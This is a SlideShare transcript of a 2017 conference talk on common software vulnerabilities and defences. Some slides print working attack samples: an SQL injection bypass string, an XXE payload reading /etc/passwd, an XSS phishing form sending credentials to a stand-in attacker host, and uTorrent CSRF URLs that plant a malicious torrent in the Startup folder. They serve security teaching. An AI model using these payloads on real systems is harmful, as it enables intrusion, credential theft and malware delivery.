SlideShare una empresa de Scribd logo

Secure Software: Action, Comedy or Drama? (2017 edition)

Descargar como PPTX, PDF
Peter Sabev
Peter Sabev

If they made movies about the most important software security issues, they could be put into five titles: Insecure Interface, Insufficient Authentication, Security Misconfiguration, Lack of Transport Encryption and Privacy Concerns. What are the action, comedy and drama parts in software security nowadays? A talk presented on IT-Weekend event in Ruse, Bulgaria (2017)

Software
1 de 122
Secure Software: Action, Comedy or Drama? (Edition 2017) Peter Sabev, p.sabev@fastlanesoft.com
Who is that man? Giotto (1266-1337) Italian painter and architect
The Mourning of Christ (1306) in Cappella degli Scrovegni
Pope Benedict XI looking for masters…
Creating perfect circles and perfect software is hard! Software as coded Intended functionality
Intended vs. Implemented Missing or Incorrect Functionality Side-effect: Most security bugs are here!
I’ll talk about the side effects today…
Sometimes bugs are found accidentally… •Logged on his father XBOX •Without knowing password •Bug with leading spaces in password field
Sometimes attacks are on purpose…
2011 Sony PlayStation Network Outage •23 days outage of all Sony PS3 and PSP consoles •77 000 000 user accounts exposed • Over 12 000 credit card numbers stolen • Outage costs were officially $171 000 000
Some Facts and Numbers 97% of scanned Java apps in 2015 that had code quality errors 95% of the mobile apps were vulnerable 90% of web apps have security vulnerabilities 87% of PHP application with vulnerable security functions 43% of developers who released apps with known vulnerabilities 39% increase of vulnerabilities in the last 5 years 10% of the applications still have hard-coded passwords Sources: Vulnerability Review 2016-2017, Flexera Software; HPE Cyber Risk Report 2016; 2015 Trustwave Global Security Report; World Quality Report 2015-2016, Capgemini; The Impact of Security on Development, Prevoty
OWASP Top 10 Vulnerabilities 2017-RC2 CWE/SANS Top 25 Most Dangerous Software Errors
The most important vulnerabilities combined into 5 titles: 1. Insecure Interface 2. Insufficient Authentication 3. Security Misconfiguration 4. Lack of Transport Encryption 5. Privacy Concerns
1. Insecure Interface • Code Injections (SQLi, XXE) • Cross-Site Scripting (XSS) • Cross-Site Request Forgery (CSRF)
THIS TALK SHOWS SOME TECHNIQUES FOR DEVELOPING BETTER SOFTWARE SECURITY AND HACKER DEFENSE ATTITUDE. YOU MAY USE THESE TECHNIQUES ON COMPUTERS, WEBSITES, SYSTEMS AND SOFTWARE THAT YOU OWN. PERFORMING HACK ATTEMPTS WITHOUT PERMISSION ON COMPUTERS THAT YOU DO NOT OWN IS ILLEGAL.
SQL Injection explained in 3 steps: String sqlQuery = "SELECT * FROM user WHERE name = '" + username +"' AND pass='" + password + "'“ SELECT * FROM user WHERE name = 'Peter' AND pass='' OR '1'='1' 2. Setting username to Peter & password to ' OR '1'= '1 produces: 1. Imagine the following piece of code: 3. '1'='1' is always true, so Peter is logged in without password.
The Comedy Part
Injection does not need to be SQL…
It does not need to be front-end either…
It can be even in <Injected Malicious Code>
It can be even in Problem: • Checked MIME type only • Fixed 8+ times until fully resolved (05/2016) • Vulnerabilities up to now: 403!!! (11/2017) • https://imagetragick.com/
Popular vulnerability in 2017: XML External Entity (XXE) Processing <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> 1. Application parses XML documents. 2. The XML processor is configured to validate and process/resolve the document type declaration (DTD):
2. Cross Site Scripting (XSS) explained <script>alert('XSS')</script> Put the following code in search field, editbox or another text component:
Funny image or banner ad? <img src="https://i.ytimg.com/vi/0vxCFIGCqnI/maxresdefau lt.jpg" width="80%">
Entire login form that tricks the user? This video is Hilarious..... worth every second'<br><br>To see the search results, please login with the form below before proceeding:<form action="http://myhackersite.com/destination.php"><t able><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><inp ut type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form><br/><br/><br/><br/><br/><br/>
The link to distribute is a little bit long… http://testasp.vulnweb.com/Search.asp?tfSearch=This%20video%20is%20Hil arious.....%20worth%20every%20second%27%3Cbr%3E%3Cbr%3ETo%20see %20the%20search%20results%2C%20please%20login%20with%20the%20for m%20below%20before%20proceeding%3A%3Cform%20action%3D%22http %3A%2F%2Fmyhackersite.com%2Fdestination.asp%22%3E%3Ctable%3E%3C tr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%3Dte xt%20length%3D20%20name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C tr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type% 3Dtext%20length%3D20%20name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ft r%3E%3C%2Ftable%3E%3Cinput%20type%3Dsubmit%20value%3DLOGIN%3 E%3C%2Fform%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3 E%3Cbr%2F%3E%3Cbr%2F%3E
But that is what URL shortening services are for… Here is your phishing URL: http://bit.ly/25zaEyy
The Drama Part
3. Cross-Site Request Forgery (CSRF) causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
3 Easy Steps for uTorrent CSRF Exploit (2008) 1. Turn on “Move completed downloads” option: http://localhost:14774/gui/?action=setsetting&s=d ir_completed_download_flag&v=
2. Change the path a completed downloads to Windows startup folder: http://localhost:14774/gui/?action=setsetting&s=d ir_completed_download&v=C:Documents%20and %20SettingsAll%20UsersStart%20MenuProgram sStartup 3 Easy Steps for uTorrent CSRF Exploit (2008)
3 Easy Steps for uTorrent CSRF Exploit (2008) 3. Provide link to torrent containing .bat file and malware software to the end user: http://localhost:14774/gui/?action=add- url&s=http://www.attacker.com/file.torrent
The Action Part
The Action Part (XSS&CSRF) X-Frame-Options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block Regenerate cookies after login. Check the IP address (or even contain it in cookies)
1. Trust no user input. Never. Ever! 2. Sanitize input and process only 100% trustworthy data. 3. Use parameterized queries and stored procedures. 4. Test! There are many scanners for SQLi, XSS, CSRF, etc. The Action Part (Summary)
Penetration Testing Tools OWASP ZAP (Zed Attack Proxy) Nikto Nmap Acunetix Bishop Vulnerability Scanner (Chrome Plugin) Firebug (Firefox plugin) HP Scrawlr & HP Webinspect Havij Pro Sqlmap
The Comedy Part
123456 password 12345678 qwerty password Which is the most popular password?
Full list: http://www.passwordrandom.com/most-popular-passwords
The Drama Part
Dictionary Attacks (Nessus + Hydra)
• 9.8% have the passwords password, 123456 or 12345678; • 14% have a password from the top 10 passwords • 40% have a password from the top 100 passwords • 79% have a password from the top 500 passwords • 91% have a password from the top 1 000 passwords • 98.8% have a password from the top 10 000 passwords
1. Limit login attempts. 2. Add password length and character requirements. The Action Part
… and the “big difference”: The 3 most popular passwords now hold “only” 1,2% of all passwords: •Password1 •Hello123 •Welcome1 Source: TrustWave
1. Limit login attempts. 2. Add password length and character requirements. 3. Password encryption The Action Part
The Worst Option: Unencrypted Password <server> <id>my.server</id> <username>admin</username> <password>Welcome1</password> </server>
Still Bad Option: Shift ASCII Code or Similar* <server> <id>my.server</id> <username>admin</username> <password>Zhofrph4</password> </server> * There was a hot dispute in developer’s forum whether shift by 5 or shift by 12 is better
Better Option: Use MD5 hash (with salt!!!) <server> <id>my.server</id> <username>admin</username> <password>{b56e0b4ea4962283bee762525c2d4 90f}</password> </server>
Even better option - Bcrypt <server> <id>my.server</id> <username>admin</username> <password>{$2a$08$zr8EtKWwENQBAztAp3o0FO 5Tbc69RuJrm6GvPhJKOZr/PNkaZKxE2}</passwo rd> </server>
1. Limit login attempts. 2. Add password length and character requirements. 3. Password encryption 4. Password recovery The Action Part
Think about password recovery
Think about password recovery
1. Limit login attempts. 2. Add password length and character requirements. 3. Password encryption 4. Password recovery 5. Protect against non-human intervention (captcha) The Action Part
Hackers are creative…
The Real Drama Part
Slack’s DB got stolen and hacked (05’2015)
LinkedIn got hacked (2012) •164 million accounts stolen •Account info sold now on black market •Check haveibeenpwned.com for your account  •There are concerns even for the current fixes
The Problem: One-Factor Authentication Something that you know
Two-Factor Authentication: Something that you know + Something that you have
Three-Factor Authentication: Something that you know + Something that you have + Something that you are
Use two or three factor authentication (at least for important stuff) The Real Action Part
Distributed Denial of Service (DDoS) • TV Show (10000s people visit your site) • Early days: ICQ • Nowadays: Malware Victim Daemon Daemon Daemon Daemon Daemon Master Real Attacker
1. Invest in hardware The Action Part
Worse than DDoS: Ransomware •Biggest problem of 2016 and 2017 •Usually encrypts the files so they become unusable •Wants money to be paid (usually in untrackable BTC)
1. Invest in hardware 2. Backup and Recovery Plans The Action Part
1. Invest in hardware 2. Backup and Recovery Plans 3. Prevent flooding The Action Part
Access Control Removing any site from Google using URL manipulation? •Exploit in Google Webmaster Tools •Fixed within 7 hours https://www.google.com/webmasters/tools/removals- request?hl=en&siteUrl=http:// {YOUR_URL} /&urlt= {URL_TO_BLOCK} 77 Source: http://www.jamesbreckenridge.co.uk/remove-any-site-from-google-even-if-you-dont-control-it.html
1. Invest in hardware 2. Backup and Recovery Plans 3. Prevent flooding 4. Use Access Control Lists 5. Secure configuration, Logging and Monitoring The Action Part
Google is not Google? (2012, Brazil) •Biggest ISP in Brazil •Firmware vulnerability •4.5 million routers •Malicious DNS servers •Fake Google.com, Facebook.com, Yahoo.com and others install malware
6. Minimum open ports and running services The Action Part
There is no escape sometimes!
Source: Vulnerability Review 2017, Flexera Software Most Vulnerable Products 2017
0 100 200 300 400 500 600 700 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014 2015 Known vulnerabilities per year by OS in the last 10 years Windows MacOS Ubuntu (incl. kernel) Debian (incl. kernel)
6. Minimum open ports and running services 7. Frequent update of firmware and software 8. Secure updates – use checksums to avoid downloading fake update The Action Part
Example 1: Wi-Fi Sniper
Example 2: Baby-Phone •IoT can be dangerous •Wi-Fi sniffing is possible •Strangers near your house?
Example 3: Tetris on Building
6. Minimum open ports and running services, use firewall 7. Frequent update of firmware and software 8. Secure updates – use checksums to avoid downloading fake update 9. Improve physical security The Action Part
The Comedy Part
A Story of How I Won an Online Game
Non-Encrypted POST query: POST /path/script.cgi HTTP/1.0 From: game@*site*.com User-Agent: HTTPTool/1.0 Content- Type: application/x-www-form-urlencoded Content- Length: 33 name=Peter&surname=Sabev&score=10 POST /path/script.cgi HTTP/1.0 From: game@*site*.com User-Agent: HTTPTool/1.0 Content- Type: application/x-www-form-urlencoded Content- Length: 36 name=Peter&surname=Sabev&score=32767 My “next game” was with the following POST query: When I finished the game, the following HTTP POST query was sent:
The Drama Part
Remotely Controlled Car
Jeep Cherokee remotely controlled •Uconnect radio breach •Anyone can control your car •Just need to know car’s IP address •Chrysler recalls 1 400 000 vehicles
Plane hacked mid-air (05’2015) •Just using laptop and LAN cable •Entertainment System connected to the Cabin Control System •Default credentials •Caused plane to climb in simulated flight
The Action Part
Use recommended, accepted and up to date implementation and follow the best encryption and authentication practices. The Action Part
Compare left and right… Facebook.com Google.com Yahoo.com Booking.com Facebook.com Google.com Yahoo.com Booking.com
The letters in red are Cyrillic (IDN attack) Facebook.com Google.com Yahoo.com Booking.com Facebook.com Google.com Yahoo.com Booking.com
Obtain EV certificate & use 2FA Issue was resolved for browsers in April 2017, still a problem for emails and links in social networks. The Action Part
London HIV Clinic •Sent emails with addresses using “To:” instead of “Bcc:” • 730 of the 781 patients contained people's full names •Fined £180,000
App needs access? •Pictures? Videos? Files? •Calls info? Device ID? •Wi-Fi networks? Friday 17 June 15.00: Italy - Sweden 18.00: Czech Republic - Croatia 21.00: Spain - Turkey
5.1 km
10.9 km 5.1 km
10.9 km 5.1 km 9.9 km
10.9 km 5.1 km 9.9 km … and probably many more!
The Ashley Madison Data Breach •9.7 GB user data stolen •Search engine “Is he cheating on you?” •32 000 000 user accounts compromised •Punishment in Saudi Arabia is death (about 1200 Saudi Arabian accounts leaked) •2 people committed suicide •$567 000 000 lawsuit
1. Collect minimum personal information (fight Marketing if needed) 2. Ensure all collected personal data is properly protected+encrypted (when stored and in transit) 3. Ensure only authorized individuals have access to personal information (incl. internally) 4. Be extra careful with logs, error messages, testing with real data, using it with 3rd parties, etc. The Action Part
Will my company be hacked? Yes, eventually! “It happened before, it will happen again… It is just a question of when.” -- Armageddon Movie
Create Responsible Disclosure Policy “Please email security@mycompany.com to report any security vulnerabilities” Organize bug bounty! See hackerone.com and bugcrowd.com Choose white hats!
The Black Hat and White Hat Book
Security Testing
Hacking Exposed Series
Links www.owasp.org Free Open Source Security Community www.sans.org SANS Institute, Certifications https://cve.mitre.org/ Common Vulnerabilities and Exposures (CVE) https://www.wired.com/category/security/ News and Updates
To avoid comedy and drama… The Action Part: Summary 1. Don’t trust user input and always sanitize it 2. Careful with passwords, use 2FA 3. Keep your software updated and secure 4. Encrypt and store securely. 5. Be careful with sensitive data
Thank you! Peter Sabev p.sabev@fastlanesoft.com fb.com/peter.sabev @BORIME4KA www.it-weekend.com www.fastlanesoft.com

Recomendados

BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat Security Conference
 
BlueHat v18 || May i see your credentials, please
BlueHat v18 || May i see your credentials, pleaseBlueHat v18 || May i see your credentials, please
BlueHat v18 || May i see your credentials, pleaseBlueHat Security Conference
 
Preventing Data Breaches: How to Tighten Your Security Stance
Preventing Data Breaches: How to Tighten Your Security StancePreventing Data Breaches: How to Tighten Your Security Stance
Preventing Data Breaches: How to Tighten Your Security StanceSara Goodison
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Understanding Active Directory Enumeration
Understanding Active Directory EnumerationUnderstanding Active Directory Enumeration
Understanding Active Directory EnumerationDaniel López Jiménez
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 

Recomendados

BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat Security Conference
 
BlueHat v18 || May i see your credentials, please
BlueHat v18 || May i see your credentials, pleaseBlueHat v18 || May i see your credentials, please
BlueHat v18 || May i see your credentials, pleaseBlueHat Security Conference
 
Preventing Data Breaches: How to Tighten Your Security Stance
Preventing Data Breaches: How to Tighten Your Security StancePreventing Data Breaches: How to Tighten Your Security Stance
Preventing Data Breaches: How to Tighten Your Security StanceSara Goodison
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Understanding Active Directory Enumeration
Understanding Active Directory EnumerationUnderstanding Active Directory Enumeration
Understanding Active Directory EnumerationDaniel López Jiménez
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)Sri Prasanna
 
News bytes Oct-2011
News bytes Oct-2011News bytes Oct-2011
News bytes Oct-2011Ashwin Patil, GCIH, GCIA, GCFE
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
1000 to 0
1000 to 01000 to 0
1000 to 0Sunny Neo
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Горизонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsГоризонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsPositive Hack Days
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCanSecWest
 
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat Security Conference
 
Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Shakacon
 
Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014Michael Gough
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...grecsl
 
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - [ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - Zoltan Balazs
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorMike Felch
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security SystemMatthew Bricker
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
From 0 to 0xdeadbeef - security mistakes that will haunt your startup
From 0 to 0xdeadbeef - security mistakes that will haunt your startupFrom 0 to 0xdeadbeef - security mistakes that will haunt your startup
From 0 to 0xdeadbeef - security mistakes that will haunt your startupDiogo Mónica
 
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложение
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложениеJS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложение
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложениеJSFestUA
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 

Más contenido relacionado

La actualidad más candente

Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)Sri Prasanna
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Горизонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsГоризонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsPositive Hack Days
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCanSecWest
 
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat Security Conference
 
Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Shakacon
 
Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014Michael Gough
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...grecsl
 
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - [ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - Zoltan Balazs
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorMike Felch
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security SystemMatthew Bricker
 
From 0 to 0xdeadbeef - security mistakes that will haunt your startup
From 0 to 0xdeadbeef - security mistakes that will haunt your startupFrom 0 to 0xdeadbeef - security mistakes that will haunt your startup
From 0 to 0xdeadbeef - security mistakes that will haunt your startupDiogo Mónica
 

La actualidad más candente (20)

Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)
 
News bytes Oct-2011
News bytes Oct-2011News bytes Oct-2011
News bytes Oct-2011
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
 
Горизонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsГоризонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре Windows
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
BlueHat v18 || Badly behaving scripts - meet amsi script behavior instrumenta...
 
Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!
 
Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014Windows logging workshop - BSides Austin 2014
Windows logging workshop - BSides Austin 2014
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
 
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - [ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security System
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
 
From 0 to 0xdeadbeef - security mistakes that will haunt your startup
From 0 to 0xdeadbeef - security mistakes that will haunt your startupFrom 0 to 0xdeadbeef - security mistakes that will haunt your startup
From 0 to 0xdeadbeef - security mistakes that will haunt your startup
 

Similar a Secure Software: Action, Comedy or Drama? (2017 edition)

JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложение
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложениеJS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложение
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложениеJSFestUA
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 
[DevDay2018] Securing the Web - By Sumanth Damarla, Tech Speaker at Mozilla
[DevDay2018] Securing the Web - By Sumanth Damarla, Tech Speaker at Mozilla[DevDay2018] Securing the Web - By Sumanth Damarla, Tech Speaker at Mozilla
[DevDay2018] Securing the Web - By Sumanth Damarla, Tech Speaker at MozillaDevDay.org
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Sumanth Damarla
 
Cryptography - You're doing it wrong! (Attila Balazs)
Cryptography - You're doing it wrong! (Attila Balazs)Cryptography - You're doing it wrong! (Attila Balazs)
Cryptography - You're doing it wrong! (Attila Balazs)ITCamp
 
Static Code Analysis PHP[tek] 2023
Static Code Analysis PHP[tek] 2023Static Code Analysis PHP[tek] 2023
Static Code Analysis PHP[tek] 2023Scott Keck-Warren
 
6 ways to hack your JavaScript application by Viktor Turskyi
6 ways to hack your JavaScript application by Viktor Turskyi 6 ways to hack your JavaScript application by Viktor Turskyi
6 ways to hack your JavaScript application by Viktor Turskyi OdessaJS Conf
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.pptImXaib
 
XSS Countermeasures in Grails
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in GrailsOSOCO
 
XSS Countermeasures in Grails
